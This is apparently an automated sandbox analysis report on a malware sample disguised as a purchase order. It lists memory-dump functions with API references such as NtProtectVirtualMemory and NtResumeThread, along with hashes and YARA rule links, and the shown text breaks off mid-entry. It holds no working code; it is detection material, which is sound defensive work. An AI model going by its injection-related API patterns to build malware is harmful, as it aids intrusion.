Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: caa404058e17f665a13c9acf5e3aa422fb28187e5cf86ac9eb20f69c43dd81a4
Instruction ID: 20e6892fe105cf622bc119d8a37b28a82609034df3eb79ea5a548b0bae0accc2
Opcode Fuzzy Hash: caa404058e17f665a13c9acf5e3aa422fb28187e5cf86ac9eb20f69c43dd81a4
Instruction Fuzzy Hash: 8CF1E074E0621CCFDB24CF69D994BA9BBFABB89304F1090AAD809E7255DB705D85CF10

Function 05AFCF18 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05AFCFCD

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: df904a0641672f205ec41a2577aa2ca208271e128ddb5dc3b1b5019bc78521e6
Instruction ID: 7e552fd18bdafeff76c41c4132125395e6264f7e2b26aa031de537d5904b9768
Opcode Fuzzy Hash: df904a0641672f205ec41a2577aa2ca208271e128ddb5dc3b1b5019bc78521e6
Instruction Fuzzy Hash: 814179B5D0425C9FCF10CFAAD980ADEFBB1BB49310F10942AE915B7210D735A946CF68

Function 0584C0A1 Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

Teq, xrefs: 0584C344

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 7ad3179db88a9c2d3af94f21e50be01049c7a2a0f2125f0a24b83f14bcedfef3
Instruction ID: 8840efabf2b1af76a698013d93a68e80985bda797f7393655d31034c07577849
Opcode Fuzzy Hash: 7ad3179db88a9c2d3af94f21e50be01049c7a2a0f2125f0a24b83f14bcedfef3
Instruction Fuzzy Hash: BCF1E074E0621DCFDB64CF69D984BA9BBF6BB89304F1080AAD809E7255DB705D85CF00

Function 05AFE400 Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05AFE496

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0d5309d9feb3f022536f590ac7bcbc6c41fbabbdb3236548c96f628535efba9a
Instruction ID: dab9cef2c9d0c40021f502ed1453837d613d4240cd06dd7f6933da74e8f84c38
Opcode Fuzzy Hash: 0d5309d9feb3f022536f590ac7bcbc6c41fbabbdb3236548c96f628535efba9a
Instruction Fuzzy Hash: 6B31CAB4D012589FCB10CFAAD880A9EFBF5FB49310F10842AE914B7350C735A946CF94

Function 05AFE408 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05AFE496

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 740c132ea46069d36ef6119f1ccaa494a4b6d29452d20804f8d53920ec45cabf
Instruction ID: f92d7dd24b0436cd8ad979f4b5b2281a4faf7dde80d86bc497d13025ad421029
Opcode Fuzzy Hash: 740c132ea46069d36ef6119f1ccaa494a4b6d29452d20804f8d53920ec45cabf
Instruction Fuzzy Hash: 6531A9B4D012189FCB10CFAAD980A9EFBF5BB49310F10942AE915B7350C735A946CF94

Function 05CAD808 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dq, xrefs: 05CAD90D

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Dq
API String ID: 0-144822681
Opcode ID: 456ac20baa20b0c6d52a6c46f910c77ba8feaaa446005c707bcc54103621fa9c
Instruction ID: 980ac78989dc933c7998b76821f9b080f81139bd27ad19ff93f878db63cbe9e1
Opcode Fuzzy Hash: 456ac20baa20b0c6d52a6c46f910c77ba8feaaa446005c707bcc54103621fa9c
Instruction Fuzzy Hash: AAD1C374E00218CFDB54DFA9D994B9DBBB2BF88300F1485A9D409AB369DB31AD85CF50

Function 05AF5AF0 Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

PHq, xrefs: 05AF5D08

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 5afc58d5098bcb2d9a2a70fcc55d0508b08e99c02541e64fa19497af45e09615
Instruction ID: 405150a0f4556272f801b5dca3f3d3e3d3b3cbbc1f00fbfb084b9f33929fb2e2
Opcode Fuzzy Hash: 5afc58d5098bcb2d9a2a70fcc55d0508b08e99c02541e64fa19497af45e09615
Instruction Fuzzy Hash: 1DB1E574D05218CFDB24CFE5D888FADBBB2BF4A305F149069E51AAB255DB705886CF10

Function 05AF5AE0 Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

PHq, xrefs: 05AF5D08

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 8adec558cfa1d37689780414a5baa20a985688809d66ee95effc69b56cf41484
Instruction ID: 82758eb8e5c8394956ffc6495aebdd4952190139af633c7db223884392198e36
Opcode Fuzzy Hash: 8adec558cfa1d37689780414a5baa20a985688809d66ee95effc69b56cf41484
Instruction Fuzzy Hash: 0DB10674D05218CFDB24CFA9D888BADBBF2FF4A305F149069E519AB255EB705886CF10

Function 05843D90 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

Teq, xrefs: 05843F63

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 4cf835d8c1505d3dd7df117b2487b9ea0701c330a474ed1ecfa5bde0704c1cdd
Instruction ID: b8ec48f351d094c606f6d6b2ba3e0954365e49c0abab3b204ba120bb081443ce
Opcode Fuzzy Hash: 4cf835d8c1505d3dd7df117b2487b9ea0701c330a474ed1ecfa5bde0704c1cdd
Instruction Fuzzy Hash: 1EA1E270E1521CCFDB64DFA9D884BADBBB2BB89305F508469E81AE7261DB705D85CF00

Function 0584CB71 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

Teq, xrefs: 0584CC0E

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 8d565899e56cc132cfb33934a57a291e83f9ca4ff57362a91ecf448dea496ace
Instruction ID: 63c25d52bd065335e29cfdcea1c6537dc2e374607941ac1604e2bbe770181737
Opcode Fuzzy Hash: 8d565899e56cc132cfb33934a57a291e83f9ca4ff57362a91ecf448dea496ace
Instruction Fuzzy Hash: ACA1D374E0621CCFEB64CFA9D944BADBBB6BB49304F24806AE809E7255DB745D85CF00

Function 05843D81 Relevance: 1.5, Strings: 1, Instructions: 230COMMON

Download Yara Rule

Strings

Teq, xrefs: 05843F63

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 40f0301076949b05f5bca49283f70a414d9629e9a616cb620ee6995cce4a4669
Instruction ID: 4912ce0649fda59599c50edc39cc5dc7a782c6ba434653b9632525331988019f
Opcode Fuzzy Hash: 40f0301076949b05f5bca49283f70a414d9629e9a616cb620ee6995cce4a4669
Instruction Fuzzy Hash: 7DA1E174E1521CCFDB24DFA9D885BADBBB2BB89304F50806AE819E7261DB705D85CF00

Function 057D89BC Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b422704ba87383463ba43b3701cc08688815f6a0d3fd7fbf0edd05e731242d44
Instruction ID: b6ac7efed77a424f5ea002f251cc39ec1a92ed7c453b19a6d47031aa10893dc8
Opcode Fuzzy Hash: b422704ba87383463ba43b3701cc08688815f6a0d3fd7fbf0edd05e731242d44
Instruction Fuzzy Hash: 7132A474A042298FCB65DF28C984BA9FBB6FB49300F1481E9E50DA7351DB31AE81DF54

Function 05AFCC80 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dec799a8bb9064abbc5368737622c409fccc56685e8587bb12f8fc14e9fb1ea
Instruction ID: 07c0f9a512ed9af327be52a707803c33e73d24e7138e7d20b09c7f30277a29ca
Opcode Fuzzy Hash: 1dec799a8bb9064abbc5368737622c409fccc56685e8587bb12f8fc14e9fb1ea
Instruction Fuzzy Hash: 3A710374E00208DFDB04DFA9D595AAEBBF2FF88310F148029E51AAB354DB34AD468F50

Function 05B14320 Relevance: 6.6, Strings: 5, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 05B14669
(q, xrefs: 05B14434
(q, xrefs: 05B1456E
(q, xrefs: 05B1448B
(q, xrefs: 05B14542

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (q$(q$(q$(q$(q
API String ID: 0-3203009404
Opcode ID: 1adaf8bad403103972bc6000b8d5f5d42991f7bd111c749b0fa269fdb94acf5e
Instruction ID: aa8c1dd88424c0234458ff1ae86fad782d18456b26c6672fc99651ff7395aaa5
Opcode Fuzzy Hash: 1adaf8bad403103972bc6000b8d5f5d42991f7bd111c749b0fa269fdb94acf5e
Instruction Fuzzy Hash: 7BB1F5317082108FDB58DF69E854A6E7BA6FFC4710B1484A9E906CB391CF39EC06C799

Function 05800048 Relevance: 4.3, Strings: 2, Instructions: 1787COMMON

Download Yara Rule

Strings

4'q, xrefs: 05801549
4'q, xrefs: 05801559

Memory Dump Source

Source File: 00000000.00000002.1315090850.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 87535cd438e5229ce51e81e143bd83d547dbbbd883295c49bd76ff68ce2d2266
Instruction ID: 58daef444d5faf6c193f6257ec730f294e6c0185787db3c837ae9438b55c2ffa
Opcode Fuzzy Hash: 87535cd438e5229ce51e81e143bd83d547dbbbd883295c49bd76ff68ce2d2266
Instruction Fuzzy Hash: 07E2D170909388DFD716DBA4CC59BAE7FB5BB06310F14419AEA01EB2E2C7785C46CB61

Function 05B16228 Relevance: 4.2, Strings: 3, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 05B166FD
Hq, xrefs: 05B1677C
Hq, xrefs: 05B1672C

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq
API String ID: 0-2505839570
Opcode ID: c7b1dd56a1f2cc3f6b49f337b86789237833ca29d1a445a337db421db2c9d095
Instruction ID: ea227d6e9091e5173a43e63d5f940358daaf819c887ce82b078e38e1e6760e40
Opcode Fuzzy Hash: c7b1dd56a1f2cc3f6b49f337b86789237833ca29d1a445a337db421db2c9d095
Instruction Fuzzy Hash: 70126B31A002048FCB64DFA9D494AAEBBB6FF88300F54856DE9069B754DB35FC46CB58

Function 05B17EE0 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 05B181D9
4'q, xrefs: 05B180FA
4'q, xrefs: 05B18259

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q
API String ID: 0-3126650252
Opcode ID: a5bb6c93a9fa154079e1f560eabc2e1a1ed1c8b735e3e8dd395180804479ec6a
Instruction ID: 41c8c70efd90119cd8585547e1f8dcb260619e7369ca3ddea1e75e67c58bb3f0
Opcode Fuzzy Hash: a5bb6c93a9fa154079e1f560eabc2e1a1ed1c8b735e3e8dd395180804479ec6a
Instruction Fuzzy Hash: 00F1C934A10218DFCB44DBA4D899A9DBBB2FF88300F558554E906AB365CF71EC42CB44

Function 00D2864F Relevance: 3.8, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Y, xrefs: 00D274F0
, xrefs: 00D2867C
V, xrefs: 00D286AC

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: $V$Y
API String ID: 0-2749217412
Opcode ID: 202bc9b5fd91826d9f2799c3d2d724b7f2d361879ecc90e4b6ca6261c94afd51
Instruction ID: 43d6bcd65d1d74054efa5204e5f80f052f1979479b290fb9337557dd95fb602a
Opcode Fuzzy Hash: 202bc9b5fd91826d9f2799c3d2d724b7f2d361879ecc90e4b6ca6261c94afd51
Instruction Fuzzy Hash: 3221A2749012A9CFDB60DF54DD48798BBF0BB58306F0084DAA549A6240DB745AC4CF51

Function 05B12748 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 05B12AC3
$q, xrefs: 05B12AB3

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: ba734df1e6e7ba7adfb8cbbab3cfeb9b027fda4b8467a796c7bbfc1b6961bccb
Instruction ID: f7104ae3417cd2a470e80f0d07d4d5024d07b403403b47944f1ff70e0fcc7995
Opcode Fuzzy Hash: ba734df1e6e7ba7adfb8cbbab3cfeb9b027fda4b8467a796c7bbfc1b6961bccb
Instruction Fuzzy Hash: FF22AD34E006298FDB15DFA5D895AAEBBB2FF48300F148055EC02A73A4DB34AD46DF94

Function 058018C0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 05801D66
4'q, xrefs: 05801D56

Memory Dump Source

Source File: 00000000.00000002.1315090850.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 3b417548a38f8f61a54afd3a392a53198ecd61a1db0efd1725e2f9ceac247d88
Instruction ID: d5a9f1337d3e7ca6815e99dd962b711a598c37888169b482809ac2645f08ce62
Opcode Fuzzy Hash: 3b417548a38f8f61a54afd3a392a53198ecd61a1db0efd1725e2f9ceac247d88
Instruction Fuzzy Hash: B2F10334E05318DFCB54DFA5E9996ADBBB6FF4A321F605429E806A7290DB346D81CF00

Function 05802858 Relevance: 2.7, Strings: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 05802AE9
4'q, xrefs: 05802AD9

Memory Dump Source

Source File: 00000000.00000002.1315090850.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 0861fb978ed7c4bdf092692513134ee0ca62c7e757a276edb855e842513b24f6
Instruction ID: d35ac37f0f3a535fc03525ca996887777d7716479324e8cc98212240c3e6ece2
Opcode Fuzzy Hash: 0861fb978ed7c4bdf092692513134ee0ca62c7e757a276edb855e842513b24f6
Instruction Fuzzy Hash: 8791C274E04218CFCB54DFA9D888AECBBB6BF49306F509029E816B7290CB756C45CF64

Function 05B11D60 Relevance: 2.7, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 05B11F05
(q, xrefs: 05B11E76

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 83ce2515a31dfa24ac495de0c24d1670edf0308095394af4f45f2be0c47735c9
Instruction ID: 1302bae9692916bf804d949bf12607d195999dc1a0482c70a9addf9c0c5bd261
Opcode Fuzzy Hash: 83ce2515a31dfa24ac495de0c24d1670edf0308095394af4f45f2be0c47735c9
Instruction Fuzzy Hash: E4518B317043108FDB58AF79D864A2E77B6EF85341B54886CDA06DB3A4CE35EC06CB99

Function 05843AD0 Relevance: 2.6, Strings: 2, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4;"V, xrefs: 05843BA0
!E$-, xrefs: 05843B9B

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: !E$-$4;"V
API String ID: 0-3568442114
Opcode ID: 5d05d4fee1acc22d8fc61926fd4a3e512168cb6ddf5dc5a761fb2d2c4d64f9d4
Instruction ID: 4580243d053b57cd80139e6dc4c9372c094aafaf04717a0eca940183c4beffe7
Opcode Fuzzy Hash: 5d05d4fee1acc22d8fc61926fd4a3e512168cb6ddf5dc5a761fb2d2c4d64f9d4
Instruction Fuzzy Hash: 1851C574E0120CDFDB18DFB9D454A9DBBB2BF89305F20842AE816AB364DB359981CF50

Function 05843AC1 Relevance: 2.6, Strings: 2, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4;"V, xrefs: 05843BA0
!E$-, xrefs: 05843B9B

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: !E$-$4;"V
API String ID: 0-3568442114
Opcode ID: e04ae8b20ab3a3c678838bcbd2c91ba476f99680260a620d81dd5cf278b64967
Instruction ID: ec5cd6010e59c9e9aeff7da1afc6f33aa8ea5a39856aa85db3b2a7e9414d55af
Opcode Fuzzy Hash: e04ae8b20ab3a3c678838bcbd2c91ba476f99680260a620d81dd5cf278b64967
Instruction Fuzzy Hash: B141C674E01208DFDB18DFB9D454A9DBBF2BF89301F20852AD815AB364DB319981CF50

Function 00D29CF2 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

Xzq, xrefs: 00D29DFE
Xzq, xrefs: 00D29D4E

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Xzq$Xzq
API String ID: 0-3730566269
Opcode ID: cc1275687ac81bca5671ac84bf5d8d30d65bef980731ec93a0dfebd8a52d59e5
Instruction ID: b9d21e4c9a20a3546f464fbd3257e99415717bcd713de286e8885f9c46f5b702
Opcode Fuzzy Hash: cc1275687ac81bca5671ac84bf5d8d30d65bef980731ec93a0dfebd8a52d59e5
Instruction Fuzzy Hash: 9851A5749112288FCB65DF24D999A98BBF9FF89300F5085E9E509A7350DB30AF80DF44

Function 05B12F43 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

$q, xrefs: 05B12FCF
$q, xrefs: 05B12FBF

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 48ccd16c91961393664a35eb5c02040cadf4279c810172838df878665d776a0a
Instruction ID: fc00e8d5158421440d404c14b6a1533c93f5c0a8650c487a6f51248b3b2dc0c6
Opcode Fuzzy Hash: 48ccd16c91961393664a35eb5c02040cadf4279c810172838df878665d776a0a
Instruction Fuzzy Hash: 671103356046098FEB64CA69D440BA9BBB1FF04320F9980F6EC45C7190D330A981C714

Function 05800000 Relevance: 2.6, Strings: 1, Instructions: 1300COMMON

Download Yara Rule

Strings

4'q, xrefs: 05801549

Memory Dump Source

Source File: 00000000.00000002.1315090850.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 5a15ce22c3d82e25d26600bdbc0ef9e3e70af77cddbfc5c69b82d6291b6f2fdd
Instruction ID: 6029f68dcb52f37de6919372d1bf73d1a538d60ea0be93e95727e7f1b0e2b991
Opcode Fuzzy Hash: 5a15ce22c3d82e25d26600bdbc0ef9e3e70af77cddbfc5c69b82d6291b6f2fdd
Instruction Fuzzy Hash: C0A2C17154D384AFE7169B74CC69B9A3FB9AB03304F19019BE640DB2E2C6785C49CB72

Function 05B0ADE0 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

&, xrefs: 05B0AE62
=, xrefs: 05B0B922

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: &$=
API String ID: 0-1778470647
Opcode ID: 9b3b91bc504c5fae018a66c3b457be00f2e3f885802ee71c21ffc85d7cae2b61
Instruction ID: e652675244960b2156b277050802e117f58a0a4a32b13e5bbcf7f2f8b3d97717
Opcode Fuzzy Hash: 9b3b91bc504c5fae018a66c3b457be00f2e3f885802ee71c21ffc85d7cae2b61
Instruction Fuzzy Hash: 7E217D74940229CFDB60DF24CC48BE9BBB1BB49305F1481EAD40DA7291D732AE85DF40

Function 05B0B7F7 Relevance: 2.5, Strings: 2, Instructions: 34COMMON

Download Yara Rule

Strings

., xrefs: 05B0AD8E
(, xrefs: 05B0B83A

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: ($.
API String ID: 0-3827376675
Opcode ID: 189fb61487831677c00cda484171c011a90624a59410dee2b313ae58a3fae478
Instruction ID: de4102275c7e1b469d30269780e972934586d3bede35f463a8c7d02e1388f817
Opcode Fuzzy Hash: 189fb61487831677c00cda484171c011a90624a59410dee2b313ae58a3fae478
Instruction Fuzzy Hash: AC112570A4122ACFDB60DF18C848BA9BBF1FB04301F0595E5D409A7281D7716E88DF40

Function 00D286C4 Relevance: 2.5, Strings: 2, Instructions: 25COMMON

Download Yara Rule

Strings

, xrefs: 00D2867C
V, xrefs: 00D286AC

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: $V
API String ID: 0-3035400853
Opcode ID: 614968711bf300350a136dd320fdf61ffa3299e42c1286b43b418e8a71b37016
Instruction ID: 73327b9195ac3efa8237b772247c6b2243a15068a08106d64ffe01c659c6b25d
Opcode Fuzzy Hash: 614968711bf300350a136dd320fdf61ffa3299e42c1286b43b418e8a71b37016
Instruction Fuzzy Hash: 21F0F974905279CFDB20EF94D84839DBBB0AB65309F1044D6D409AA240DB749AC5DE21

Function 05845023 Relevance: 2.5, Strings: 2, Instructions: 25COMMON

Download Yara Rule

Strings

0, xrefs: 0584502D
7, xrefs: 0584505D

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 0$7
API String ID: 0-2457827371
Opcode ID: 324c6b3fef04e6dc3be9b61a93fe63527586a97df1d44063f696b175125850b8
Instruction ID: 7ae01d376c49ae78479cd4cd3999cd930c0980da40d201de2ddac63b27ebc53b
Opcode Fuzzy Hash: 324c6b3fef04e6dc3be9b61a93fe63527586a97df1d44063f696b175125850b8
Instruction Fuzzy Hash: 7CF0B2B4A02228DFDB60CF14D889B9DBBB1BB05305F5081DAD94AA2250DB741EC9CF56

Function 05B18DC0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,q, xrefs: 05B1913B

Memory Dump Source

